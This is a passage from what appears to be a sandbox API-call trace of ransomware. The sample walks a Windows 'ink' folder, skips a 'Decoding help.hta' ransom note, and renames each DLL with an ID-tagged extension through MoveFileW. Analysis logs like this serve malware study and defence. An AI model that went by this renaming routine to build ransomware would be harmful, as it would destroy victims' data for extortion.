lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="mraut.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll" [0042.712] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll" [0042.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.712] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mraut.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mraut.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.712] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x475edf2f, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x475edf2f, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x9c6db320, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0042.712] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.712] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.712] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mshwgst.dll") returned -1 [0042.713] lstrlenW (lpString="mshwgst.dll") returned 11 [0042.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.713] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="mshwgst.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll" [0042.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll" [0042.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwgst.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwgst.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwgst.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.713] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e0734e, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x53e0734e, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x9c702420, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0042.713] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.713] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.713] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.713] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mshwLatin.dll") returned -1 [0042.713] lstrlenW (lpString="mshwLatin.dll") returned 13 [0042.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.713] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="mshwLatin.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" [0042.713] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" [0042.713] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwlatin.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mshwLatin.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mshwlatin.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.713] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20326ec4, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x20326ec4, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xb95fefd0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="penchs.dll", cAlternateFileName="")) returned 1 [0042.713] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.714] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.714] lstrcmpiW (lpString1="Decoding help.hta", lpString2="penchs.dll") returned -1 [0042.714] lstrlenW (lpString="penchs.dll") returned 10 [0042.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.714] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="penchs.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll" [0042.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll" [0042.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penchs.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penchs.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penchs.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.714] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20373182, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x20373182, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xb964aac0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="pencht.dll", cAlternateFileName="")) returned 1 [0042.714] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.714] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.714] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.714] lstrcmpiW (lpString1="Decoding help.hta", lpString2="pencht.dll") returned -1 [0042.714] lstrlenW (lpString="pencht.dll") returned 10 [0042.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.714] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="pencht.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll" [0042.714] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll" [0042.714] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pencht.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\pencht.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\pencht.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.715] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x203992e1, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x203992e1, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xb964aac0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="penjpn.dll", cAlternateFileName="")) returned 1 [0042.715] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.715] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.715] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.715] lstrcmpiW (lpString1="Decoding help.hta", lpString2="penjpn.dll") returned -1 [0042.715] lstrlenW (lpString="penjpn.dll") returned 10 [0042.715] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.715] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.715] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="penjpn.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll" [0042.715] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll" [0042.715] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penjpn.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penjpn.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penjpn.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.717] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x203bf440, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x203bf440, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xb964aac0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="penkor.dll", cAlternateFileName="")) returned 1 [0042.717] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.717] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.717] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.717] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.717] lstrcmpiW (lpString1="Decoding help.hta", lpString2="penkor.dll") returned -1 [0042.717] lstrlenW (lpString="penkor.dll") returned 10 [0042.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.718] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="penkor.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll" [0042.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll" [0042.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penkor.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penkor.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penkor.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.718] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x203bf440, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x203bf440, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xb96965b0, ftLastWriteTime.dwHighDateTime=0x1ca041f, nFileSizeHigh=0x0, nFileSizeLow=0x600, dwReserved0=0x0, dwReserved1=0x0, cFileName="penusa.dll", cAlternateFileName="")) returned 1 [0042.718] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.718] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.718] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.718] lstrcmpiW (lpString1="Decoding help.hta", lpString2="penusa.dll") returned -1 [0042.718] lstrlenW (lpString="penusa.dll") returned 10 [0042.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.718] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="penusa.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll" [0042.718] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll" [0042.718] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\penusa.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\penusa.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft 